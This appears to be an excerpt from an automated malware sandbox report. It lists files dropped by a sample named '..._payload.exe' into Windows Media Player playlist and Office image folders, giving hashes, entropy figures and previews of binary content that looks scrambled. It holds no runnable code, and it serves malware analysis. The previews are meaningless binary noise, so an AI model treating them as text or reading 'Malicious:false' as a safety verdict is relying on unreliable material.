                                                                                                                                                                      Preview:<?wplea.:..t.....eWP^7..~.A.G........Z..\...2m....%..J....O$...Q.N.UDf&.....P...T_...........WD..n`..Y...43'?..........j..OV.w1.YG..XI.S..5.U&5..q..../.tJ.Z..N.....J...%.0:m.j.d.l. Y.ss..i.Y....R}.B..H.....W.m....n.^d.:.........*........u.8......)m....P.OFi1......Jz.g-......O..;.8d.J.....2._*......8...6........N..D.!.<./_-:D..i.I........kr^..*l...~.x.I...B...3./#Iu...U..8..4.....-.`{g.T.0..+..Tj.(...AD#`].PX...@.......6.v_.. ...au9f.QE.*E..^..1ExW0....]S.wP.G;...S.sN...C.u'1.-.........H...BQ.,}.`l7.......8..Z[.(...*....T.s.G`......9.|.Yj....h...6....Y.w.5...J.K...P.[j4...r.ht..H.J;o..ERhK.1....C....c...xI.......\..|No.[....".H.$!..%9c..R....w"+.;....C((.....X..g|.WO.rv.K..Y...O......&r8....G!Y.J.........k.5...B...>S..Z]%...V..z....5.C.Z..4.Ib....>...........`8.D.bL.....WX\.lu._..0..o.V.~....dq....v........K.gf.....I..{ySE..K$.`..G.*]....4........D..M..,\..kY$r.L#...H....Cwp.t...'.a.1.1my2....iV..3.Z<..d..........Bk.l.]N.9u..sztK..z...k..x.,-.&.u.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\08_Video_rated_at_4_or_5_stars.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1354
                                                                                                                                                                      Entropy (8bit):7.8265878641842
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NtcdPPXda9PtxgJpm8vY1G/BdFDtQUpACMV7Nvm6I+frGpHF+prryK+2bD:C/IPjwm8w1GZdFDoVpm5KiaD
                                                                                                                                                                      MD5:CFFB4BFA55ACD6CBBF671FFAB360801B
                                                                                                                                                                      SHA1:D489D2DBF5A85BEE3ED354124CCF5AFE002B5267
                                                                                                                                                                      SHA-256:20DEACBFB29543F4C3DF2E7A9FD9EF77E9CE8105A1D6EB66ECAA4A95F3B79AD3
                                                                                                                                                                      SHA-512:537F0DB27B5D28180405A323E4828C2F563437DDBE8010A03B7AAAD00F93A3AA84D2F382CF77C39F5D3EBAC142CC5FB5DC4F651FC9B5A8657FD4915E10A76168
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl.kI6".......[w.c.....dn........L.....k..rU...d.9.T..:.....g.w.%..Y...%.Fzq.`[e.:..O...........:$Q..YT..Q..h..T...u.....`...T>......n.__)E..^..Dq.Tn.c.l3./...a....S...7.`.....^...k<...%...q....T.h.;.y.......k....~.....Z.<...:`"^...z.$,.4.G...f.h.C..-;.D.E..J.0.r..X8.]C...c.".*...BVa.'...)...G.......c.A.G.....m.O..".8.D.~...*...0Z...c...)....e..:N.P...+.Z^.j %.w....e.B..>..R.j.W...aU....n./+...y.9...e~..S..w~..?Xo.w.*9..o.`.h [.{t..?J.@...o...z...Z./p.r...b+N5aI.w..A.s.$...k[(Q..~.o.<G..i...;8...tJ<nD.M.OS"..D...j.^.........I6*..........#F.v.|i.0...j.9o...{..M..C......<...*.RC....O%<.....F....B!...?.dGgD^g...T...!?....[..{`..'.,J~.T.8_...>u.|~....b.d.E..>..z.6..4....e....UM.....\.A.-..ShJ..e..u_>._..;Rt......i.U..v2d.C]...M.wFh..K.y..(.=...},?...].."...:..Ah@[.d.dN$Nx..9.F....NQ.u......s.0e....o)...\.....c.....P|...9?..1..jU..........n.f0r.3+...?Or....*....kI.M.[.\..~...=....&..).................:R.}.T...%)..=.......PS.U..(......9'..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\09_Music_played_the_most.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1359
                                                                                                                                                                      Entropy (8bit):7.819752107305788
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:v6PWeBu0m1Dmpc4B5t8DJmQSvOmNXA8UA2uQCywATAQ7mh2bD:iPWApm1O5t8DQOcA8U/xwAsYm6D
                                                                                                                                                                      MD5:E9AEBEC6BC47F770F8ED38C9F45459B3
                                                                                                                                                                      SHA1:B6B1D421B9AD3EE41B663B7E042331D6BEEFC446
                                                                                                                                                                      SHA-256:B8F63B87B8F6A481773935CCC5C3267C5AEF227CB86D2A29ED80E78B74550658
                                                                                                                                                                      SHA-512:390530312D52EDBAD1317CAF83949490652E436783AB7EAB12EB2301D546C9FB66C81D4E7672B04EE2F9AF5A1C1E908AB5016BB6A8400D2387E6962C277158F1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl..l...Y.,4.VT39z.."..i9..(cZ,o.6.i....$.....1.......>..u.......m.. .$1..4.(..<.g..6._..+n.r..ui.|.......:..[*`...*...vr\81...U...l]..v.M+.Z...g:..w!D.D...H....;.....w.O........V.bZ...b..p.<kE...8.+.fZ.7.o.w.=R..x.<9.1Tbr.&.1.._......W.....6.C..Q..[....Se.\2...^.<...a...B.)>_...r......."-...`..D............&n..`m5....4G......Vf.:...T:.$.m.....5v.*.v..6..I*5.<..Z..../....p...OP.........Xip..^.*J(.>.......#....W..E.C,4..F.......7..M.o..USu*Y.!6.*.is...h..W.*.}..NtK.Uz..W<...$P....O...9.........${4L.;d...[.H...C..y\.D.a../.......[.1..?9.7.J....:..B*.Z.1.O...0n.y`...].....rZ..XfTu. ..~At..a.N...P5V..]3P.$.:..<pP!..A..R.H".w....!...#2...s.&.B.i.Ey./."..[..y..9.m(E.+.r...+X....v.....^i<...VT!.&.*....8jb...@zF.......*.Z..}Mo.....=)d.Y...g|....6.\|H..h...].Lc"..w..o... $MM..|.&Qr.l..1vr..w....DqK.mM..|.]....Fm.r...$3.S..F>.\..7..5y.E..]_fH...(..B...r>8.....Z._L..7..!W\'.V.vn.....dg.kv.A...W...o..T....'F.?].W.6...D.8...b`S5...t.......s....t....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\10_All_Music.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1397
                                                                                                                                                                      Entropy (8bit):7.85715744570177
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9/7opfL83lz7fRJqIekhAYVl0O5w3ATXWJI10Y74DDw4+kShStUdoD2bD:9/7tTqIn/0P3AP0YEDDrDS4utD
                                                                                                                                                                      MD5:440E261BA741DDDE2C848918B7FE3EBE
                                                                                                                                                                      SHA1:F8F5624B8E236E1477188CC09F253D714FFBD554
                                                                                                                                                                      SHA-256:09595D77A62B926AE4FA5AB3C46918C825E6B725A6EAC6BC5D6F805A130AE5BE
                                                                                                                                                                      SHA-512:3671474876D3BA43CD9790C246B1E3A908C2FB2460B593DA5827B268B29F1A2571AB3463E953AD02937AF1CFDD03B7A8C6B7E926BC6B4C4EDF886733B23DDE5C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wplGr.!.|.....vp.m.aS.m.~g.(....`...!{;.O..f.}.*.-.s\.$d..../>6.N..6T'A.N....~.@}..h^.....PY...w(....y...y.R,2i.X@.|...}....Z..4..*..=~.......Rm.o.l...SK5.7'<..>R....._q%.....b.....8;}.M`!.uJ...o.R/.]I~u.\..6+.tnl.....0t..%.f.....1\,X..L...g.j..<..c...z.0.28............C`G.C....8........C.K.ve...Q...(..g...@<. \....k.....@..g..&}. ..7*k{..q...B....,..v..{..v..>)q...l~#.<t..H9@;.1.K....I_....<.X.....\...T.=..X.+2..Z.+..'.$.`.....:.......lc.......w.c.;.......&...@.S.z......K...,..q.i.J..K. .c........HP./..x.}h...;...."....L._.'M....>......0.K..qR.b..0....C...hcGZ...e.%........FM.~.f....l&.;o;...M...R..Kk".......(...e..).e...>O.....0...R6...,..."=..[#.:O. u0W.......A.....O:{S.S.l..-.r.%....Sr8.]n....K+....7...3.@......q.....gL..~.>...u=.A.Z"r.W..*.P......;|.F'l....7.........3....|..y.c{7D\E.t!/.d9.7w1.....15.#U..&.|..N....n..e.h.E...n*...,./*M...$U...DdB.$1."..S..e..7...!...j.#...o......W?.......'..3...X,.R...p9.._...L..e.+Jl....1...;

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\11_All_Pictures.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):919
                                                                                                                                                                      Entropy (8bit):7.761985538001618
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ZrMfi8uQmyO/Xh2wkAxKdc92L8iZZMSuSPEqKY312bD:Z2cyw7mdHfZQ4NHOD
                                                                                                                                                                      MD5:D187FD58DCA70D44555B963DBAE2317E
                                                                                                                                                                      SHA1:362E33028183F6011852AB16B42D553AB0FC07DD
                                                                                                                                                                      SHA-256:6E19846E2F99E1BD34ADF4A5CFD4A7EA782336C32EAD8D3025AB0409A1038F5F
                                                                                                                                                                      SHA-512:B63DA9698EE1903A087FDE18A929009F239F854B9F7C2BD63B5D9C9679DDEED8DC23C3F57B17DA2E947B3943C9B9D0B96782203AB45809B5FA1C0AEF7EA100BB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl.i..#.lKc.A.....e.N..W/...tT.".....$...8Yq.\wl...z.).G.P.E.~.S...*=c.K2.....H.+\.-.F..Y.c...d.t.L......KB...3.@m...[......h. .Z...UJ..E\.v...zd..g.Aa[!.E..n|..+1..)..`,\...s.Zz..!.Q....B.a.GP.RU.w.KR.&..@.P...3v.n;.u.0MU.JFd.+.b..ZqRr....>V..3.&.~.{...'..."..\~\.).J..y...DR...\&;....N.E....d.....8...^.._.p....Ja...d+A.4]......qn...1.FE.......g..TB...ic0.9.+~...Y.N.-%.8$n........H...vp[..*.-..P....!.....+..............`.d%.w...*.."....a.=.k.J'.S^j.-!.JC....U..3..u..T.p.n.Z..l....Xr.:......2.....OZ./...=;.cM.....:....M.5.B..g..fY;.......ShaN:p.^.Da...J?.......At...L.A..0.y5G.. ......W.....L.w,........Z(..!V...B......1#N......Mv..;....MZg...T......ksZnA.s_..|^$.;VY....m..;E'..4.~GM.l..T.\...8..)..?s.@........aE...F.B...V......hS.%.vdu.m.V6.5.F....b......pE...Tm..(....Z.....J....t..J.EEmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\12_All_Video.wpl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1413
                                                                                                                                                                      Entropy (8bit):7.8502158980322125
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TbsPraQhq8qwxk7IlFiQVTP5/LzYyOfyxjcLbNgXDW93j7P2bD:TbYraQ5+OTh/L0yVxjgGzW3jAD
                                                                                                                                                                      MD5:21AAC1C71586A44E4DA5394A88D6C5E2
                                                                                                                                                                      SHA1:96383A90341491E0FC1094BC8ED4564DC50190FA
                                                                                                                                                                      SHA-256:E59356AAF47C824806610DBB5855373F508D0928B04BF20D81A5C001BF65B91A
                                                                                                                                                                      SHA-512:0FD86F71AA2FD6EA77207E0B5C12C747F537833170F5F65F868FB9603F6E434B19076C7356E63AA03CDE491D2DEB2762CC0C7F566DF735D18D4F802026B5FB5A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?wpl2.r..f....&.2>....WaN.V..b..... ..x^~......&..<5`/I.D...D...........4..VU{i.......a.$B.~.G..).kg..t.#q.t.I..S.Y..#Nz...'.."....h...p.3.=...9O..jO..j*....i.BP....0w.l b.<..X.y../1.E@up..2.SE(........t...+..D.&%..E.}.3|..'j".]jx+L.L..]...W....s1..@.-.=&.?....zS..V...Vz6....T...zl"!.S0^V0.J.M.....)$_..1..=WQ..-N'.\."..7.9&!4;..C?I.gv+.!..\N. ...(..E$.y....Q...w.=.............G...}..N.....n..3nr..>eB.....Y.>......6...3....1b...rmYZ.s..;.t...gx.W.+o...>.]G3'...">x...X....ok....8.yh..].?..'.j(hf;...\"L......j..XP._b{......y.@.t....0.j...."^5....sH....f..>.,B......#..1o.:...<y&.WF!z[k.!k.[.'......X)r....u....Z.....,...._1.....`br...g...=R..bg...oV...[...h..*Ba...1.._M....Of.t.>s.].t..-..G.o%..."....N{?..M.....e.1c.0;C....<.G9..(..C2..u......u.....^...4_..-+.H...5....GbyL[rH.o.*7.n..=J...&ZW}.'.k.A...nHS.._.....G&"l..K...<4s\)\>H>..x.kz......v....r.8%.e....Z....._mZN.u.Z.f..t...C.a../.0.........w_.Q..v.8.....q.[.#....DD]6.`.nN...:.Y'...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{45F61A7D-A745-417E-BD88-2FFDE87A6DA8}mt16400656.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7074
                                                                                                                                                                      Entropy (8bit):7.972504288170028
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:zZRex54vK2MsPTCMqWtFObjyMddxiKU03XadodgJwpiHz0vFAq8SUgC1Yt8R2xUu:tRg4VdRqfvbL3csiT0CTSUZyOIxiAYSF
                                                                                                                                                                      MD5:7729A3CD5D79E181ED1EE885ED0989D0
                                                                                                                                                                      SHA1:2DDB6763B295DF49A87ACBF555B096041BFFC600
                                                                                                                                                                      SHA-256:66CE7E100105BCA117992BC3F982A58FF364103B2D12B1F3C89BAE008E2ABCF4
                                                                                                                                                                      SHA-512:951A5DBBED7319888E32887C0397604F9A0C038CFAA95910EEC0FA2D91D1C7D935A1D53A9E5A512446652E6EBA103E876348961B0E58782E6CD1C5AA52654517
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG.......]3....<.B.j.V5.O...F.;..@."...t(d.AT...j.;.'.S...<..>..'G.Uc.d..........D.....v_...a..y$..P.....nN..F...P.D.[jl..S!.8.x..Od..j1.(.iJ+........az.`.!.+.D[Qy:.S....rx"YT~.q>...hKY.."......1..q.;.S.v.T:..y....+N....pq...hL!....U....h.%.O...]../.uSJ. .......q2...n.,ys.."......E0[.....o:.%T.}...&.).Y......./j..k.C._!....&&....J.(..[^.[..$.P.........]....:..X.pI...................AU...`.JE......5c.............B.ED.dK0....#.r:Q.*..j{{..e...\.)...?os.s_.........F..%of..6...o*.Ve..Ml...#.vJ....%..f..!......*o....^.F..n.}....._...;j....l(tE.p.b*N..I.L......=..\.ME....j...G..M.k.G.&b..z....A...x<X....Er.|....@)..>...-..u.\.@~........'d..l....b~....U.K....S....9OtR.bq....gp..!u.Fk..G..d.:..u\.{.].....*...S..Exk......G]B.u+...^.9.....c.B<....%.J.m....T..B@..b.=.>.......u.g?...Q8d0+5;...p.Tb.<@.R..M.1..Iw.ws/.Qr.vV.k..nJ?.D.J.T.Y=......T.n9V.".].,u....o..pb...M.x.......<..\......'l,.7..../.c.\.Q.I.M.a..7..nMD..l`.e.)R..l..{.*U.G{.c./%.r8..x.h..J.q..P

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{7B3AF8A2-A95D-4447-ACC9-7895C91C2D45}mt16400647.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7438
                                                                                                                                                                      Entropy (8bit):7.97180081204538
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:r5HPvMF+EiOIM5QxDRx5erW2XPxMLlcqkrseDaNbBy4I0:GkxOIMWljIrzCLmr4Ns0
                                                                                                                                                                      MD5:6B3996B0E2E43AE689EA1132FB444957
                                                                                                                                                                      SHA1:6026FFD2B3F057BAD51458DFB51497FB8B2967FB
                                                                                                                                                                      SHA-256:716AAD4DB1447CC1280E0F050E644B078FC4A6B6E691A3CB31341E8E6BBD7744
                                                                                                                                                                      SHA-512:5DC82E09BDEAEAA2082A091FB5C5BAD0519C195BA7CE52754431F318C70EC9E88741AA966F48C34EA56DEE6FA8528686EFC3D851E4592FAFF64FB971C99D1336
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG..>lf..U..m.. .B.<.|qJ4#K..L...3.....<.O..... .......f&.;B..'u|!rG..$w...B...X......z.vv.wC..:h!o..F........m.../.....B...@..b.Ly.........ro..1....e.i$i..0.c..o........l:.$..-.yy........J......7.Ux.hzYz.(<-.N.....?...X.,..R.wo..F!1...)Qp.|"Ntt'.T....l.....#.>..U.1......%.p.lq..m..`.y..].<.0.C...M+U...,O..+...DM...z.p...y....y2.>.qL.....]......3w....P.........cZ5f..o.x....s.....[i.p..a.L.)..W.}...U..1c.`...P...7.AC......." ...|.q.(w..u.{ .s$x...........L..h"(..eu.<....f6P.O.t.f..w....Y.h.N....t.&.....DL.F?..b..d.h@...V..h(.;......2.uN.1..x..... ..]....1...zl}....T.=.......W.+R..D6.....F.k`..'.P.#.p,....$.e....Y........"..;....@x.K.g]...B'.0-....fM.u.`....)+s.( Qr..'...h..0............H?.m!..[.?.I))2..d. ...Z....y.(....r.Kb.....#..a.VR:.X.Az'....m.Wn...!.M.y....H..'m..7[=..g.....C..k....Y^..mo..P...9bS...^.z.F*..Z.<. .S..y.A.gV..H...V..X.bq..z4..N....C..H.9...).!.e.5...y@../S.......zlp....n.e.5..B..X..V....1q...u/G..mi.X?....k.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{7D2AAE1F-E21C-4042-8EAB-08D27101C10B}mt11414620.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8887
                                                                                                                                                                      Entropy (8bit):7.977784870457796
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Hi0Zt6O6m4/+f3F8gy4EA5B85aYcjTsLL2lIAFe00kK63nHfWFLy5:tZtZW/aJtJL8mTW2l7FeyXQ8
                                                                                                                                                                      MD5:B075D611E5FB04B72EA134D25E95C0F1
                                                                                                                                                                      SHA1:8E313ED53FB416A13E3A5F94A5ABF52B85AF4B52
                                                                                                                                                                      SHA-256:FB08759E8C01108068DA38D4B1BDD8BAA813E01D8C043210D12DE6F0A6B381D7
                                                                                                                                                                      SHA-512:8EC13362688D99E89879D84C6B69E5BF8D1771532AB07DA0F750765DED2284877E9EDBE14AA1C3197A382293DE1B4F69C60D57546A913BB95BD48A7262BDB671
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG..$z...u..B..Su..B..N...y.\.*..:.no.,..T&./.n.-ZL7..B..e...J.G..JX}..|.q..a.....:.B*.J..0.I.HOh...t7..{....I..Dg=......4.......665A.........<.4...c..6.}u.,...f`X..V.I...@D..6.W...P.|>....n. }.......LxD...g.......'..U.G....x8......m..5....7.Y..U........Bx.~.1}.GrH.P.<wMK..gmd...+...I..(...pETV..o..?....J...5....U.b~.8...R..Q.*..M....~.wj.GU...^q.O...."){..VE..XU...o..M..W..D......6)..Z.v..|.........V.:hn..f5.!...].WP+sK9~..Y7.L.....i.Gv.....|&.v.@n6e;.P......?.S@.X..y..Q..KX..u.i..<c0h.G&.F*f,.._n|<..6...'\..IA../5....['.b.....2.X:1.Kp>..p.oq!....#iL.wd.^.xk...E.&...v.."M..G..s.R..8..A..x}BfYN.D0...H.Z..x...,..&T..y.R.O.%...9....&`1....k.j..j....G._g'.....2.@..EF........s...6@..e.R,a.D.......S..q.9.:S........,EJ..?U.. ...~...........S^...O. 5.R3.....Bi9..y.#V.....`..B.......r. .'(h$.b.-. D?uF...gm~..d.l.Z...:...,.b.A.H!M.1..Z.]#s..J.,+...!...b.,MoO.K..b.c.mn.X;..-.......m..t.."d>....t.2U.....N ..H......).....<..x..^...1..V{yQ....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{967E9DC2-54C6-4D72-9409-715F9A3F61E5}mt11829122.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):14457
                                                                                                                                                                      Entropy (8bit):7.986373978181505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:bU+5OAmwvcrdXj4Yuac6vh/3rGHzKSYMbeAww5IeNd:bV5OU0aYuel342S/bzwoLX
                                                                                                                                                                      MD5:CCC43E5D4021589D1371112E4E4B170E
                                                                                                                                                                      SHA1:D446535D191D8BB6E91BC6702FC968CED7549129
                                                                                                                                                                      SHA-256:EF53EF0E40116DC9D8337B4E67472127212579736A142BF2D5D9AD72169F2A16
                                                                                                                                                                      SHA-512:732612A0A450F7FC74FD05E91BE5B64DD5896E573B058E84F63C8650E209A209BA5B5A0EB9D13792CB254C59580377C2F3DE30EF3371D261CA1B7FC5E7AC5C42
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG......w$..)9\C{MVlU.w..C.1.km...lL.L."P.f.Hj/.:.g....1bB.HW.wL.\7.^k..h.f.K1..v/....-}...2.`~Pg......X1..cS..1.}.u?R.......Gf$V.F.;`F.v.....Voz6N....lm5.@.......(+(a$9.w..T..o..Z...B...tg..S.HA.I....,...o...j..@.....v|..Vz....*.8...FK.p..~J......D..K........E.......A&..{..P9/........f...C.\.q$..D3.K.....=.M7>.4....B..q..zIH....S....L.Q.%.{.FB.|...[O....(7.hDp......z..L...E..K>....8}~#..L.XR.Wf..)..`....%..[#.k.......G9k.4.t..t.R].M.kq.....H.`.+.(.."..\..:..........].m.n...-.9.t=m2.G>TY..^....P..>..gJ.~....nF`..T.0W..*. G.....N.9U...e..B...;.&.+..3&...].Y..Yt..$...m0#U.8tr.)..%u9/v...m.g..g.<..V...g...l@w.WfQ.P.#.{...y...`.4z..h..As.0Dp.....?.Tz.....kq.....o.4q._...f8...&.....3.oL.7....b.Vg..z...&*&.}.J.9.......l.@JH..m.q...B....@.*..M... v..?O....c.:.S..&NO....Zif....].....2....x.R.......8..!........ tF.ux.P.*..R.....NF.+~...vr".|._ni.;.w.d~..3..u...L........b...lV..x$.e..lT..X.B...>.\.`..u...%..V..Q.K...s/X..:+3.N...&.8;...=....G

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{A4858C46-92BF-4775-ADF9-F93EB4C5F636}mt66963475.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7986
                                                                                                                                                                      Entropy (8bit):7.978241679519314
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:X5Lbkrt1X7JvVlgvBDEgiReanpaT/E0gY53ocP/rVwlwTD:RQrt1X7Jv0pDSRe4paQa53PrVwKX
                                                                                                                                                                      MD5:E90E324ED1D45D5B85EA51793EE09BD8
                                                                                                                                                                      SHA1:61262F4082EC7D111B5B4929E92FDE10CE2921B2
                                                                                                                                                                      SHA-256:04030E1F3DDF0F0B45E956F221FD05D11929D4F597A03129400CB573E6194DFB
                                                                                                                                                                      SHA-512:E4D9C0B93336223A5FFDD31AEF375FAA8C22C43B8A85CE20D4FB51B3B3A93E92AA72877E6145CBFD1CDE61B01D243F9AFEDE62BF71B7A7C86F96338D02B16ADC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG.........`.._.~Du6.......b....u..&.+.......;.t.s9..fe.._.^.....}..siX..{n.......AW.........x...Gxg.1.>.^....qo.Y.W.{.8S..~Z|.....@.....d..W..&(d.j....@..b.............bl.\TT...3.?O.XLuX.DDd...h0...a..t.Cg.....k~<(..;....M0....e..._H...2I..........$.....6.K>...& wT..N.P.v.@.U.{.r"..}...*.J...=&d.!&s.|[q...i..Q4Q9..|VZv....$.(.{I......+..f...k.!1..=..3}..0{..u..G...WL..(L}t..?......oe....O...rU.....Eo0..Rm`..Z.J..&..}.....P.~5....]]^......0...._.....W.]|W..M...*.h..F&.)....uuf>*KQ.....^.0.X...je.|.Jn.2c..-u.p......d0..-P.\0..(:..c....z.$Q.K...{....-...7J.1..0.f&.HI9.....:.m[\....|~fV..&.j..F...j.d"s.Pj..U.r.......L.T.L...^$i..7[,].Cr9G...o..dS#.a...'....$w.c.....].z!..v].x.s%;.@q..=........I.Z.<K..2A...9..cE...w.:..U..o+<W..P..M&r.D.LPj.ky...y............U |..5.-..|...b........r......igZ.%..r.j..b%l.V.Z..?_.1...x..p.\.V..1......S.].B.w.,.I.B..........'$..U...>....2.t....y$kk........s....Z..C.L@..P.E.!\..OCNA........WB..@.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{AA4547C7-FE83-48AB-9053-3A60F16A4C34}mt10000137.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5293
                                                                                                                                                                      Entropy (8bit):7.965546163721949
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:++eiH/hrnp6fPDLTDG7AmDk0NzUmap69b9eTdUPYy4KB+sVxDmxdwb3l:++3fhLpYHG140NzBJZeTdUEe/DSG
                                                                                                                                                                      MD5:E30C4CA770678700333BC37AD201A962
                                                                                                                                                                      SHA1:ECB0FB7CD3978B2E46AA43A1C4D6387720771E2C
                                                                                                                                                                      SHA-256:CDC6F0B8BF48EFED097B0F35A017BC571971BF12243B1FA791FB001245F34A61
                                                                                                                                                                      SHA-512:371BC0C9CA02855F366799A9D98EB9052B89193E69AA9B493087FF683674256F56D9A1641865BF157CFD1F1BF821AF9549E870C37841F28AAFC03032270F4CFD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG.H.H..2.@....p.;.x...ZQd.L..N."..D.>..M.3.@...4.*...5.9......0..)..y.. Chd.4..]../...Z..x..*'..f;R(....:..n9V.4.....,...2L.^-%DBDl......_.)"..[...=.Q....C....d.|.t...Q.q...b. ..k.....2..%.]..,.o.h.(F..r..l/..u.{..6Wuc..Ho...Dy...M.vhh;>4...%m!...{....y.9.#..E....C"+=.... ..<q.^f8s.)..k<.#..b....#tF4W;-@..wS..@T..!K.......g..._...7...A.p.......Ej.v.O....o.5....>..H.9.R.<t.u...nJ*vlW.....d.K..`.E.X.4.Oo......AvT......y.9.;.j..%......{..h..P........."...} .$.).I..tA..9.G.}..Q.L....#YB...!BfW...]&}$@..q...;..Q%.:F...*.Dc....l..W.x.7.`....j34. {.".u;`8w.J..........}..A..9=..v..VA..O.5..U.#...wq.tvS..e...\.;.:.....`1c...T.=....Y.._4e..........P.2....3.|-..K.F..TS?..N.J.?...nw..<.....#~#.[...n...B>...T.;.fb.-.a.....p?H^...h.....]..t..V........e....\.]iLO..+Y....e2.[..O.......0+.V....../.?.%.s...k;p..... ........_;:!..3>B.L..bs.....O..NUG.3..}C.b..=r.....l.c.{fO..s....]}..o:*1.nf4*..&z.....fK.....<;h.T.WBX...M..e.wv.f@....NX.7..u.k9.3..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{F5FB5847-D24A-455C-A647-40C253091672}mt67739505.png

